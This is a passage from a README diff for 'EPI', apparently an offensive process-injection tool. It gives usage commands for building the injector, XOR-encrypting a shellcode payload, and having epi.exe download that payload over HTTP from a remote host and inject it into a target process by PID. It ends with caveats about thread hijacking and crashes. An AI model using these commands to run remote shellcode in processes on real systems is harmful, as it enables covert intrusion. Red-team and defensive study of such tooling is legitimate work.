Kudaes/EPI/README.md

 	C:\Users\User\Desktop\EPI> python3 builder.py -p c:\path\to\payload.bin
 	C:\Users\User\Desktop\EPI\EPI\target\release> epi.exe -h

-In case you don't want to embed the payload in the resulting binary, you can encrypt it (simple xor encryption) using the `-d` flag and then download it directly into the injector's process memory using HTTP:

-	C:\Users\User\Desktop\EPI> python3 builder.py -p c:\path\to\payload.bin -d

-The resulting encrypted payload will be written to the `payload` directory.
-The encryption key will be the same value used for the `LITCRYPT_ENCRYPT_KEY` environment variable.
-You have to pass this value to `epi.exe` to be able to decrypt the payload in runtime:

-	C:\Users\User\Desktop\EPI\EPI\target\release> epi.exe -p <PID> -u http://remoteip/payload.bin -k setarandomkeyeachtime [flags]

 Be aware that, depending on the behaviour of your shellcode, you might end up hijacking the thread and potentially causing a process crash.
 Also, take into account that no cleanup will be performed when injecting this way, leading to all kind of unexpected process behaviours.

 ## Loader & Custom payload